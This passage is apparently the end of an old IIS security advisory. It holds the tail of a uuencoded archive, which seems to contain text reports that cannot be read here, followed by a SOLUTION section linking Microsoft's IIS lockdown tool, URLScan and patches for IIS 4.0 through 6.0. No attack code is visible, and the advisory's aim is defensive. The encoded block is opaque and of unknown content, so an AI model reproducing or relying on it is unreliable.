M9@T-V]9>-=IR57<RS#C!C06QV='@YQ`.#M/2^.[Y1H)5I54C-1-XJ.4D5\$]
M.#%<&)-A/`PKMJUB9#-R_4B=]I]ZW%'Z\/O%1<6<GI=%F*V`J15C*T@RK6S?
M1KN.X0LRW-`!Q3L9I]\]WZ$AV]M<Z-$Z50?T-J4G8S\6*J$3]-0*Q>LG>RZJ
MV9<QW1AJAC::3H95^P@Q>+*?0[,\>CB;EZF@IU+FN"*U3INBD'$U6J7_>KJ3
M;U^G:?BM3C[]B8,,%ZI^/�L.?.^/1'=4[$GMAJG*7E+C)!P0]$9G$:"O-$
M+5B$=+:M?YGR69WT[M$)AM@>]Z-'=6L^?4?@=#LD/TOO5N-S#.ZL;NL\N2S:
M([N=599_U7P\AL]/P1K=09M,\3G6A9*ITT)UM*DZNFIU4<B<;AF5\--FJ<UC
M/J9%9S^R!4W+@D":TTKF[!$S!PDK=G=GV0,E(H7PB&GW<0!)?Z#'2@4]P$TE
M9`ER!21))'/,D([4I.+XCVW*=O1\YP]WH':'3S/PLG0PKB_3-69YC$$8RR1K
MHLRVS$UW>&:\I),BPCZ#7L5:52"0+9)]V3..PD)!3UY%'%FE5`<+^(F=^;L*
M\^`9[D.'TQJ/ERH+L@]:0CND];1E#X9EU49VPL\4LZ2TY\H?D3('-)X]GN&X
MT'OV#W;(;O]6_?G.^<G1_F0Z'!ESM\>TF\O8=>J3"D/?'YA3"NY1$AV&2,05
MW=5\:"._YP=2UE'.6X_*7WS(U^U4C_G."_M'+:*@JD//8YA*V!>_P&SM&8"[
M4O+9!V4ME1[\T<D3=^J!GJ[S`TI/U+I=65-<EKDNW<S<\&YG)7+%W&\^!A-T
M,8'+S_E/9W[>N/<_4$L!`A8+%`````@`0VB++!@@]I0\!@``GPP```T`````
M`````0`@`("!`````')E<&]R=%\Q,"YT>'102P$"%@L4````"``F9XLLW$%K
M[N8!``!L`P``#``````````!`"``@(%G!@``<F5P;W)T7S8N='AT4$L!`A8+
M%`````@`&F>++`7?E=[W!P``K1,```P``````````0`@`("!=P@``')E<&]R
M=%\U+G1X=%!+`0(6"Q0````(`%IGBRS;F+>]W`,``,4'```,``````````$`
M(`"`@9@0``!R97!O<G1?."YT>'102P$"%@L4``(`"`"!4J8LLM^M-$<5``"K
M-0``#``````````!`"``@(&>%```<F5P;W)T7S$N='AT4$L%!@`````%``4`
*(P$```\J````````
`
end
11080 bytes
SOLUTION
Hint :
Although the following will not protect you from all vulnerabilities,
it can't do no harm to help secure your server with :
http://www.microsoft.com/technet/security/tools/locktool.asp
http://www.microsoft.com/technet/security/URLScan.asp
Microsoft IIS 4.0:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=37931
Microsoft IIS 5.0:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=37824
Microsoft IIS 5.1:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=37857
Microsoft IIS 6.0:
Beta versions of .NET Server after Build 3605 contains fixes for IIS 6.0